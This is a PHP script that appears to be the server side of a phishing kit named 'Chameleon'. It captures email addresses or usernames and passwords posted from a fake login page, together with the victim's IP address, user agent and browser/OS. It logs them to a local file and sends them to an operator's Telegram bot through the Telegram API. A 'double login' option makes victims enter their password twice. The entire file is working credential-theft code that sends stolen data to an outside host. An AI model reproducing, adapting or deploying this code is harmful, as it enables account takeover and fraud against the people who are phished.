<?php

header('Access-Control-Allow-Origin: *');
header('Access-Control-Allow-Methods: POST, GET');
header('Access-Control-Allow-Headers: Origin, Content-Type, Accept, Authorization, X-Request-With');

// Load config
$settings = include 'config.php';

if ((!empty(trim($_POST['email'])) || !empty(trim($_POST['username']))) && !empty(trim($_POST['password']))) {
    function get_client_ip() {
        $ipaddress = "";
        if (getenv("HTTP_CLIENT_IP"))
            $ipaddress = getenv("HTTP_CLIENT_IP");
        else if (getenv("HTTP_X_FORWARDED_FOR"))
            $ipaddress = getenv("HTTP_X_FORWARDED_FOR");
        else if (getenv("HTTP_X_FORWARDED"))
            $ipaddress = getenv("HTTP_X_FORWARDED");
        else if (getenv("HTTP_FORWARDED_FOR"))
            $ipaddress = getenv("HTTP_FORWARDED_FOR");
        else if (getenv("HTTP_FORWARDED"))
            $ipaddress = getenv("HTTP_FORWARDED");
        else if (getenv("REMOTE_ADDR"))
            $ipaddress = getenv("REMOTE_ADDR");
        else
            $ipaddress = "UNKNOWN";
        return $ipaddress;
    }

    function ParseUA() {
        $UA = "";
        $UAHeaders = [
            "HTTP_USER_AGENT", "HTTP_X_OPERAMINI_PHONE_UA", "HTTP_X_DEVICE_USER_AGENT",
            "HTTP_X_UCBROWSER_DEVICE_UA", "HTTP_FROM", "HTTP_X_SCANNER",
            "HTTP_X_ORIGINAL_USER_AGENT", "HTTP_X_SKYFIRE_PHONE",
            "HTTP_X_BOLT_PHONE_UA", "HTTP_DEVICE_STOCK_UA"
        ];
        foreach ($UAHeaders as $header) {
            if (isset($_SERVER[$header]) && !empty(trim($_SERVER[$header]))) {
                $UA = $_SERVER[$header];
                break;
            }
        }
        return $UA;
    }

    function getBrowserOS($userAgent) {
        $browser = "Unknown";
        $os = "Unknown";
        
        // Detect OS
        if (preg_match('/windows|win32|win64/i', $userAgent)) {
            $os = "Windows";
        } elseif (preg_match('/macintosh|mac os x/i', $userAgent)) {
            $os = "macOS";
        } elseif (preg_match('/linux/i', $userAgent)) {
            $os = "Linux";
        } elseif (preg_match('/android/i', $userAgent)) {
            $os = "Android";
        } elseif (preg_match('/iphone|ipad|ipod/i', $userAgent)) {
            $os = "iOS";
        }
        
        // Detect Browser
        if (preg_match('/chrome/i', $userAgent) && !preg_match('/edg|opr/i', $userAgent)) {
            $browser = "Chrome";
        } elseif (preg_match('/firefox/i', $userAgent)) {
            $browser = "Firefox";
        } elseif (preg_match('/safari/i', $userAgent) && !preg_match('/chrome/i', $userAgent)) {
            $browser = "Safari";
        } elseif (preg_match('/edg/i', $userAgent)) {
            $browser = "Edge";
        } elseif (preg_match('/opr|opera/i', $userAgent)) {
            $browser = "Opera";
        }
        
        return $os . " / " . $browser;
    }

    function save_logs($message) {
        $path = 'chameleon_results.txt';
        return file_put_contents($path, $message . PHP_EOL, FILE_APPEND);
    }

    function mx_record ($email) {
        $domain = explode('@', $email)[1];
        $arr= dns_get_record($domain,DNS_MX);
        if($arr[0]['host']==$domain&&!empty($arr[0]['target'])){
            return $arr[0]['target'];
        } else {return $domain;}
    }

    $IP = get_client_ip();
    $UserAgent = ParseUA();
    $email = isset($_POST['email']) ? $_POST['email'] : (isset($_POST['username']) ? $_POST['username'] : '');
    $password = $_POST['password'];
    $login_attempt = isset($_POST['login_attempt']) ? intval($_POST['login_attempt']) : 1;
    
    // Get settings from config
    $telegrambot = $settings['bot_url'];
    $telegramchatid = $settings['chat_id'];
    $double_login = $settings['double_login'];
    
    $mx_record = mx_record($email);
    $domain = strtoupper(explode('@', $email)[1]);
    $os = getBrowserOS($UserAgent);

    // Format Telegram message with HTML
    $msgtg = "🔐 <b>{$domain} LOGIN DETAILS</b> 🔐\n";
    $msgtg .= "━━━━━━━━━━━━━━━\n\n";
    $msgtg .= "👤 <b>LOGIN INFO</b>\n";
    $msgtg .= "• EMAIL ADDRESS : <code>" . htmlspecialchars($email) . "</code>\n";
    $msgtg .= "• PASSWORD : <code>" . htmlspecialchars($password) . "</code>\n";
    if ($double_login == "1" && $login_attempt == 1) {
        $msgtg .= "• ATTEMPT : <code>First Attempt</code>\n";
    } elseif ($double_login == "1" && $login_attempt == 2) {
        $msgtg .= "• ATTEMPT : <code>Second Attempt </code>\n";
    }
    $msgtg .= "\n";
    $msgtg .= "📍 <b>LOCATION INFO</b>\n";
    $msgtg .= "IP ADDRESS: <code>{$IP}</code>\n";
    $msgtg .= "BROWSER: <code>{$os}</code>\n";
    $msgtg .= "LOCATION: https://www.geoiptool.com/?IP={$IP}\n\n";
    $msgtg .= "━━━━━━━━━━━━━━━\n";
    $msgtg .= "⏰ " . date("F j, Y g:i a") . "\n\n";
    $msgtg .= " + Dev: <a href='https://t.me/xforgex'>@xforgex</a> +";

    // Save plain text log
    $logMessage = "******* Chameleon {$mx_record} ******" . PHP_EOL;
    $logMessage .= "Email: {$email}" . PHP_EOL;
    $logMessage .= "Password: {$password}" . PHP_EOL;
    if ($double_login == "1") {
        $logMessage .= "Login Attempt: {$login_attempt}" . PHP_EOL;
    }
    $logMessage .= "IP: {$IP}" . PHP_EOL;
    $logMessage .= "User-Agent: {$UserAgent}" . PHP_EOL;
    $logMessage .= "Browser/OS: {$os}" . PHP_EOL;
    $logMessage .= "Time: " . date("F j, Y g:i a") . PHP_EOL;
    $logMessage .= "**************************" . PHP_EOL;
    save_logs($logMessage);

    // Send to Telegram
    $website = "https://api.telegram.org/bot" . $telegrambot;
    $params = [
        'chat_id' => $telegramchatid,
        'text' => $msgtg,
        'parse_mode' => 'HTML'
    ];
    $ch = curl_init($website . '/sendMessage');
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, ($params));
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $result = curl_exec($ch);
    curl_close($ch);
    
    // Return response for double login handling
    header('Content-Type: application/json');
    echo json_encode([
        'success' => true,
        'double_login' => $double_login,
        'login_attempt' => $login_attempt,
        'require_second' => ($double_login == "1" && $login_attempt == 1)
    ]);
    exit;
}

?>
